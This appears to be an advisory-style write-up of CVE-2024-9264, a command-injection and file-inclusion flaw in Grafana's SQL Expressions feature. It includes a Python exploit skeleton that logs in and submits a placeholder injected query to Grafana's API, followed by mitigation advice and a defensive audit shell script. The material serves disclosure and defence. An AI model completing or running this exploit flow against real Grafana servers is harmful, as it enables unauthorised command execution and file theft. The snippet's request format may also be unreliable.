CVE-2024-9264 - Unsanitized SQL Expressions in Grafana Allow Command Injection and Local File Inclusion

Grafana is a widely used open-source data visualization and monitoring tool. A recently disclosed vulnerability, CVE-2024-9264, affects its experimental SQL Expressions feature. The feature lets users evaluate DuckDB queries that contain user input, and that input is insufficiently sanitized before being passed to DuckDB, resulting in command injection and local file inclusion. Any Grafana user with the VIEWER role or higher can carry out this attack.

Note that the attack only succeeds when the duckdb binary is present in Grafana's $PATH. The binary is not installed by default in Grafana distributions, so unmodified installations are less likely to be affected.

Details and Exploit

The vulnerability stems from improper sanitization of the SQL expressions users submit to Grafana. When a malicious user sends a specially crafted DuckDB query through Grafana's interface, they can inject operating system commands or read files from the server on which Grafana is running.

Below is a code snippet illustrating the exploit flow (the query payload is left as a placeholder):

import requests

# Replace with your Grafana URL, username, and password
# (Grafana listens on port 3000 by default)
grafana_url = "http://localhost:3000"
username = "admin"
password = "admin"

# Log in to Grafana to obtain the auth token
auth_url = f"{grafana_url}/api/auth/login"
auth_payload = {"user": username, "password": password}
auth_response = requests.post(auth_url, json=auth_payload)
auth_response.raise_for_status()  # stop early if the login failed
auth_token = auth_response.json()["authToken"]

# Create a malicious duckdb query (placeholder: the injected command or
# included file path is not given in this write-up)
malicious_query = ";os_command_to_inject_or_local_file_to_include;"

# Send a request to the Grafana API with the malicious query, and the auth token
exploit_url = f"{grafana_url}/api/tsdb/query"
headers = {"Authorization": f"Bearer {auth_token}"}
exploit_payload = {
    "queries": [
        {
            "expr": malicious_query,  # the SQL Expression that duckdb evaluates
            "intervalMs": 60000,
            "maxDataPoints": 960,
            "refId": "A",
            "datasourceId": 1,
        }
    ],
    "from": "1560418321266",  # query time range, epoch milliseconds
    "to": "1560432923266",
}
exploit_response = requests.post(exploit_url, json=exploit_payload, headers=headers)
print(exploit_response.json())

The snippet walks through the exploit: log in to Grafana, craft a malicious DuckDB query, and submit it through the Grafana API.

Mitigation and Remediation

Because this is an experimental feature, disable it if it is not in use. Grafana administrators should also ensure the duckdb binary is not on Grafana's $PATH unless the SQL Expressions feature is actively needed.
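The two preconditions named above (feature enabled, duckdb binary on PATH) can be audited on a Grafana host with a small script. The following is an added example, not code from this write-up or from the Grafana project. It assumes that the SQL Expressions feature is controlled by a feature toggle named sqlExpressions in the [feature_toggles] section of grafana.ini (toggle name assumed; confirm it against your Grafana version's documentation), that grafana.ini lives at /etc/grafana/grafana.ini unless GRAFANA_INI is set, and that it is run as the grafana service user so the PATH it inspects matches the one Grafana sees.

```shell
#!/bin/sh
# Added example (not from the advisory or from Grafana): audit the two
# preconditions for CVE-2024-9264 on a Grafana host.
#
# Assumptions, labelled:
#   - The SQL Expressions feature is gated by the Grafana feature toggle
#     named "sqlExpressions" under [feature_toggles] in grafana.ini
#     (toggle name assumed; verify against your version's docs).
#   - grafana.ini is at /etc/grafana/grafana.ini unless GRAFANA_INI is set.

# binary_on_path NAME PATHLIST
# Prints the first executable NAME found in the colon-separated PATHLIST and
# exits 0; exits 1 if none is found. The body is a subshell so the IFS change
# does not leak into the caller.
binary_on_path() (
  name=$1
  IFS=:
  for dir in $2; do
    if [ -n "$dir" ] && [ -x "$dir/$name" ] && [ ! -d "$dir/$name" ]; then
      printf '%s\n' "$dir/$name"
      exit 0
    fi
  done
  exit 1
)

# feature_toggle_enabled INI_FILE TOGGLE
# Exits 0 if TOGGLE is enabled in the [feature_toggles] section, either as
# "TOGGLE = true" or as a member of the comma-separated "enable = a,b,c" list.
# Keys with the same name in other sections are ignored; comment lines skipped.
feature_toggle_enabled() {
  [ -r "$1" ] || return 1
  awk -v toggle="$2" '
    /^[[:space:]]*\[/ { in_section = ($0 ~ /^[[:space:]]*\[feature_toggles\]/); next }
    !in_section || /^[[:space:]]*[;#]/ { next }
    {
      eq = index($0, "=")
      if (eq == 0) next
      key = substr($0, 1, eq - 1); val = substr($0, eq + 1)
      gsub(/[[:space:]]/, "", key); gsub(/[[:space:]]/, "", val)
      if (key == toggle && (val == "true" || val == "1")) found = 1
      if (key == "enable") {
        n = split(val, items, ",")
        for (i = 1; i <= n; i++) if (items[i] == toggle) found = 1
      }
    }
    END { exit found ? 0 : 1 }
  ' "$1"
}

# grafana_sqlexpr_audit PATHLIST INI_FILE
# Prints a short report. Returns 1 when both preconditions hold (host is
# exposed), 0 otherwise.
grafana_sqlexpr_audit() {
  pathlist=$1; ini=$2; risk=0
  if bin=$(binary_on_path duckdb "$pathlist"); then
    echo "duckdb binary found on PATH: $bin"
    risk=$((risk + 1))
  else
    echo "duckdb binary not found on PATH"
  fi
  if feature_toggle_enabled "$ini" sqlExpressions; then
    echo "sqlExpressions feature toggle is enabled in $ini"
    risk=$((risk + 1))
  else
    echo "sqlExpressions feature toggle not enabled (or $ini unreadable)"
  fi
  if [ "$risk" -eq 2 ]; then
    echo "RESULT: both preconditions for CVE-2024-9264 present; disable the toggle or remove duckdb from PATH"
    return 1
  fi
  echo "RESULT: preconditions not fully met"
  return 0
}

grafana_sqlexpr_audit "$PATH" "${GRAFANA_INI:-/etc/grafana/grafana.ini}"
```

Run it as the grafana service user (for example via sudo -u grafana) so the PATH checked is the service's own; the exit status is 1 only when both the toggle is on and a duckdb executable is reachable, which makes it easy to wire into a configuration-compliance check.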

Grafana has already been informed about this issue, and a fix is expected in a future version. Until then, use this feature with caution and monitor for unexpected user behavior.

Timeline

Published on: 10/18/2024 04:15:04 UTC
Last modified on: 10/18/2024 12:52:33 UTC